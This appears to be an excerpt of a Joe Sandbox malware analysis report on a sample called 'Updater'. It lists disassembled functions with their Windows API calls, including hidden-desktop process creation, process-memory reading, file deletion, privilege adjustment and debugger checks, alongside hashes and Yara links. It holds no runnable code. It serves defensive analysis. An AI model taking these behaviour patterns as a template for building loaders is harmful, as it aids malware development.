Opcode ID: e156f384a120867f9ab721cf266c3539458f25f9f69fe3bf83c2cd076642fad9
Instruction ID: 415251dc43e8d4e0c2860ca1d4a482db84cd12ef419dd04ea602b2793c06a5ef
Opcode Fuzzy Hash: e156f384a120867f9ab721cf266c3539458f25f9f69fe3bf83c2cd076642fad9
Instruction Fuzzy Hash: 0EA16E71918244AFC354EFA4C895DAFB7EDEF94300F04491EF58686292EB34DA09CB66

Function 014B5BC9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 167processsynchronizationCOMMON

Download Yara Rule

APIs

CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 014B5C93
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,014B5DC2), ref: 014B5CD4
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 014B5D11
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,014B5DC2), ref: 014B5D4A
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 014B5D82
WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,014B5DC2), ref: 014B5D95

Strings

D, xrefs: 014B5C64

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Create$Process$DesktopObjectSingleWait
String ID: D
API String ID: 183768610-2746444292
Opcode ID: 9e392d9a1e87e2db28d579fed074bdf6472a89a175c1a6494f57214e66a76e0c
Instruction ID: c0f433a665078c9eb32412aa0ee99959c8836b30a3d0dbf02d6175cc2633430e
Opcode Fuzzy Hash: 9e392d9a1e87e2db28d579fed074bdf6472a89a175c1a6494f57214e66a76e0c
Instruction Fuzzy Hash: 1251F074A4030EAFEB10DB95CC85FDEB7BCEF28710F61426AB514AB2A0D774A9058B54

Function 0073E180 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006D119F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D1192,?), ref: 006D11BF

GetFileAttributesW.KERNEL32(?), ref: 0073E1C0
FindFirstFileW.KERNEL32(?,?), ref: 0073E1FD
DeleteFileW.KERNEL32(?,?,?,?), ref: 0073E24D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0073E25E
FindClose.KERNEL32(00000000), ref: 0073E275
FindClose.KERNEL32(00000000), ref: 0073E27E

Strings

\*.*, xrefs: 0073E1CF

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: d922c6de31484f4f317305496ed0475c8bd4735324b3e19a5823a0ed99622ade
Instruction ID: 2daadb28e41db6ce0a983f2a9b1222eba5ef4795da546a041fc63d0768ab94dd
Opcode Fuzzy Hash: d922c6de31484f4f317305496ed0475c8bd4735324b3e19a5823a0ed99622ade
Instruction Fuzzy Hash: E0319231418345AFD704EF64D8959AFB7A9BE55300F404E2EF8E6821E2EB24DE09C756

Function 0070E32F Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0070E475

Strings

1#SNAN, xrefs: 0070F674
1#INF, xrefs: 0070F682
1#QNAN, xrefs: 0070F67B
1#IND, xrefs: 0070F66D

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 7462febd9d6795ca285236fbe115a735b71a735a4483d8e10eb56df8b3987c02
Instruction ID: da05edfb7c4267df5f37df21e0ac201b4e115ff353fb831f8cae9ac75573b986
Opcode Fuzzy Hash: 7462febd9d6795ca285236fbe115a735b71a735a4483d8e10eb56df8b3987c02
Instruction Fuzzy Hash: E9C22971E08628CBDB25CE28DD447EAB7F5EB44314F1446EAD84DE7281E779AE818F40

Function 014B89A9 Relevance: 9.2, Strings: 7, Instructions: 450COMMON

Download Yara Rule

Strings

ReadProcessMemory, xrefs: 014B8CCB, 014B8CD1
LoadLibraryA, xrefs: 014B8C9F, 014B8CA5
ddre, xrefs: 014B8AC6
VirtualAlloc, xrefs: 014B8CAF, 014B8CB2
OpenProcess, xrefs: 014B8CBB, 014B8CC1
GetP, xrefs: 014B8ABB
CloseHandle, xrefs: 014B8CDB, 014B8CE1

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID:
String ID: CloseHandle$GetP$LoadLibraryA$OpenProcess$ReadProcessMemory$VirtualAlloc$ddre
API String ID: 0-74115134
Opcode ID: 4cd9f9ecbeb5a7e973a920515f3bfac52f909a65e1fd192fa73b7d5d25a518c3
Instruction ID: f1aa1d1fd59f936134c13a5387d81a0c6af310eaabffa986adeaa65f253a0383
Opcode Fuzzy Hash: 4cd9f9ecbeb5a7e973a920515f3bfac52f909a65e1fd192fa73b7d5d25a518c3
Instruction Fuzzy Hash: 82221470E04299DFDB11CBA8C884B9EBBF5AF19314F184099E588EB352C375AE44CF65

Function 014B89A2 Relevance: 9.1, Strings: 7, Instructions: 361COMMON

Download Yara Rule

Strings

ReadProcessMemory, xrefs: 014B8CCB, 014B8CD1
LoadLibraryA, xrefs: 014B8C9F, 014B8CA5
ddre, xrefs: 014B8AC6
VirtualAlloc, xrefs: 014B8CAF, 014B8CB2
OpenProcess, xrefs: 014B8CBB, 014B8CC1
GetP, xrefs: 014B8ABB
CloseHandle, xrefs: 014B8CDB, 014B8CE1

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID:
String ID: CloseHandle$GetP$LoadLibraryA$OpenProcess$ReadProcessMemory$VirtualAlloc$ddre
API String ID: 0-74115134
Opcode ID: f009389dbf6bdb488227933d29eee8e8557a806c60bfa5e10011c3ddaf01dae6
Instruction ID: 429d02ae614ea88fb77ea299b105afb82ca85ace57aae0641b615a9b880ae34c
Opcode Fuzzy Hash: f009389dbf6bdb488227933d29eee8e8557a806c60bfa5e10011c3ddaf01dae6
Instruction Fuzzy Hash: A4022A70E04298DFEB11CBACC885B9EBBF5AF19304F184099E588AB352C3759E54CF65

Function 00752E89 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00752E97

Part of subcall function 0074F035: GetWindowRect.USER32(?,?), ref: 0074F04D

GetDesktopWindow.USER32 ref: 00752EC1
GetWindowRect.USER32(00000000), ref: 00752EC8
mouse_event.USER32(00008001,?,?,?,?), ref: 00752EFA

Part of subcall function 0073F7F5: Sleep.KERNEL32 ref: 0073F86D

GetCursorPos.USER32(?), ref: 00752F26
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00752F84

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 97d49b9ca8980387fa297602cfad338cfe4a813a003b09fb4d67f53008057d5e
Instruction ID: 1f30c84b329970eeea8bf7290c9892b1c17f374a9f2a9f764bb12beae1bfe72f
Opcode Fuzzy Hash: 97d49b9ca8980387fa297602cfad338cfe4a813a003b09fb4d67f53008057d5e
Instruction Fuzzy Hash: 0031F6326053069BD720DF14D849E9BB7EAFF89344F000519F88997192C774ED09CB96

Function 00738056 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007380BE
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007380F4
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00738105
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00738187

Strings

DllGetClassObject, xrefs: 007380FA

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 7e3530eec8f3c88e63969c82579df66016b68e518215fc29579b24fd22959d68
Instruction ID: ecb4a6661952b32691c730395cab92f4f48e3148521681a7832e9b9ddea4f488
Opcode Fuzzy Hash: 7e3530eec8f3c88e63969c82579df66016b68e518215fc29579b24fd22959d68
Instruction Fuzzy Hash: 5D417CB1600308EFEB55CF54C884A9A7BB9EF44710F1481ADF9099F206DBB9DD41DBA1

Function 0074A66E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0074A6BB
Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0074A6EB
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0074A7B8
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0074A7CE

Strings

*.*, xrefs: 0074A6A0

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Find$File$CloseFirstNextSleep_wcslen
String ID: *.*
API String ID: 2693929171-438819550
Opcode ID: 7f3b6dfb98f2ff275ac0a7b064c0f546f90be3f8ecc16ea90b30ce7e533604a7
Instruction ID: 65a4c9b48cf48cc78f0a92a5b97ee48527fd10e396f0dbc0ffa85ca1e5c85319
Opcode Fuzzy Hash: 7f3b6dfb98f2ff275ac0a7b064c0f546f90be3f8ecc16ea90b30ce7e533604a7
Instruction Fuzzy Hash: DC417271D4020EAFCF65DF64C849AEEBBB5EF05310F14406AE815A2291DB349E44CF55

Function 007523E0 Relevance: 7.7, APIs: 5, Instructions: 154networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00753B94: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00753BC5
Part of subcall function 00753B94: _wcslen.LIBCMT ref: 00753BE4
Part of subcall function 00753B94: htons.WSOCK32(00000000,?,?,00000000), ref: 00753C2D

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00752437
WSAGetLastError.WSOCK32 ref: 0075245E
bind.WSOCK32(00000000,?,00000010), ref: 007524B5
WSAGetLastError.WSOCK32 ref: 007524C0
closesocket.WSOCK32(00000000), ref: 007524EF

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesockethtonsinet_addrsocket
String ID:
API String ID: 1501050944-0
Opcode ID: b2a3168a329ae533a258acb8c903b5f7735c21ef7f337a7a48976522a330ef36
Instruction ID: d3047a9f7e0d3bfca718dfdc630b65a034fdfa401f66e8db802cb971ea280d05
Opcode Fuzzy Hash: b2a3168a329ae533a258acb8c903b5f7735c21ef7f337a7a48976522a330ef36
Instruction Fuzzy Hash: 1351E271A00210AFD760AF24C896F6ABBA5AB45714F14C09DFD055F383CBB5AD42C7A1

Function 0073E2AB Relevance: 7.6, APIs: 5, Instructions: 91processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0073E2D0
Process32FirstW.KERNEL32(00000000,?), ref: 0073E2DE
Process32NextW.KERNEL32(00000000,?), ref: 0073E2FE
CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?), ref: 0073E376
CloseHandle.KERNEL32(00000000), ref: 0073E3BC

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
String ID:
API String ID: 2000298826-0
Opcode ID: cb9e69cb1b537a96b2b48571d092b3b101952b84a32747345935922906838ef3
Instruction ID: 83e54f67c95505c92a81ee3633aa55653db616e89107cc5d90ce08be92b0cdbd
Opcode Fuzzy Hash: cb9e69cb1b537a96b2b48571d092b3b101952b84a32747345935922906838ef3
Instruction Fuzzy Hash: 4D318F715083019FD314DFA0C885BAFBBE9AF89340F44092DF586872E1EBB59945CB92

Function 00762558 Relevance: 7.6, APIs: 5, Instructions: 79windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 007625D0
IsWindowEnabled.USER32 ref: 007625DE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 007625EB
IsIconic.USER32 ref: 007625F9
IsZoomed.USER32 ref: 00762607

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 1beb10ee373d017aa27778903ba0e16120bbf81dc7e0a48c9bb7833363430422
Instruction ID: 536621379003720e0a226bdec64729eba907c2639a51f6eb0dd57b07dd359b94
Opcode Fuzzy Hash: 1beb10ee373d017aa27778903ba0e16120bbf81dc7e0a48c9bb7833363430422
Instruction Fuzzy Hash: 6521F331B00A119FD7718F16C854B167B94AF44358F148099E80B8BA53CBB9ED43CBA1

Function 007320BE Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007320D4
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007320E0
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007320EF
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007320F6
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0073210C

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 83964eae21f12944b9e3b4409c02a370a473492313340428a95883ffa81292c3
Instruction ID: d4567c6743d9ee7e48e33cc6122c84694b5e25e8462376c3116a92c422cbf68b
Opcode Fuzzy Hash: 83964eae21f12944b9e3b4409c02a370a473492313340428a95883ffa81292c3
Instruction Fuzzy Hash: 59F06275710305BBDB210FA5DC4EF563B6DEF89760F114414FA46D7252CAB9EC018A60

Function 00739168 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 569stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0073917A

Strings

(, xrefs: 007391C0
py, xrefs: 00739451
|, xrefs: 007391AA

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: lstrlen
String ID: ($|$py
API String ID: 1659193697-823948841
Opcode ID: 78bdde17aab7e64e575f36a8e403ccf97deeda3f475952de7f92e31a2e113696
Instruction ID: 45e170ad9dc9cfb9528820a292e18d417d1fcba557f149b1750251cce7813d46
Opcode Fuzzy Hash: 78bdde17aab7e64e575f36a8e403ccf97deeda3f475952de7f92e31a2e113696
Instruction Fuzzy Hash: AE322475A00A05DFDB28CF59C081A6AB7F0FF48310B11C46EE59ADB3A2E7B4E941CB44

Function 0074686D Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00746897
FindNextFileW.KERNEL32(00000000,?), ref: 007468ED
FindClose.KERNEL32(?), ref: 00746935

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 336870beda50f4215460c49f1690fc48b8aa8737bc762760d888ba10b181d20a
Instruction ID: d232b0d9ac379b61facccfd9f78b157e88fd7c2f4ff9267a302a5c9757281e5c
Opcode Fuzzy Hash: 336870beda50f4215460c49f1690fc48b8aa8737bc762760d888ba10b181d20a
Instruction Fuzzy Hash: 3D519874A046019FD714DF28C490EAAB7E4FF4A320F14415EE56A8B3A2DB74FD05CB92

Function 00702446 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000004), ref: 0070253E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000004), ref: 00702548
UnhandledExceptionFilter.KERNEL32(006D1221,?,?,?,?,?,00000004), ref: 00702555

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f34714bf299859c11fbf45bb4be6f90ba0dc1587106c8577334e71024a3ff05b
Instruction ID: 2e42f72b1c76135731981e4d0b899724eec975bb37e6f4feda70977846fcdf40
Opcode Fuzzy Hash: f34714bf299859c11fbf45bb4be6f90ba0dc1587106c8577334e71024a3ff05b
Instruction Fuzzy Hash: A631C47591122CABCB61DF24DC8879DBBB8AF08310F5042DAE91CA7291E7749F858F49

Function 007327D9 Relevance: 4.6, APIs: 3, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 006F042B: __CxxThrowException@8.LIBVCRUNTIME ref: 006F0C74
Part of subcall function 006F042B: __CxxThrowException@8.LIBVCRUNTIME ref: 006F0C91

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00732823
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00732850
GetLastError.KERNEL32 ref: 00732860

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 539536c51b8008e14a8edfec48c6cdbd0688acb818fecc8340a30f59cd0fc05e
Instruction ID: 465d4d162b31f3be67c5c094a4d4faf58ad07dca5e75d95d1deda676e745464c
Opcode Fuzzy Hash: 539536c51b8008e14a8edfec48c6cdbd0688acb818fecc8340a30f59cd0fc05e
Instruction Fuzzy Hash: DE11B2B1914309EFE7289F54EC86D6AB7F9EB04710F20812EF54653242EB74BC418A64

Function 0073E3CB Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0073E3E8
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0073E429
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0073E434

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: d0f2e368605399fd20f329278466c8be3fdceba1c3f2c747ed3bd392cd9fe99a
Instruction ID: abb5dc34000032dd967b44b544232d7b9ae24c512eb44ada3da74acbf68f7124
Opcode Fuzzy Hash: d0f2e368605399fd20f329278466c8be3fdceba1c3f2c747ed3bd392cd9fe99a
Instruction Fuzzy Hash: A4117071E01328BFEB208F959C44BAFBBBCEB49B60F108151F904E7280C6744E058BA1

Function 00732777 Relevance: 4.5, APIs: 3, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007327A0
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007327B5
FreeSid.ADVAPI32(?), ref: 007327C5

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

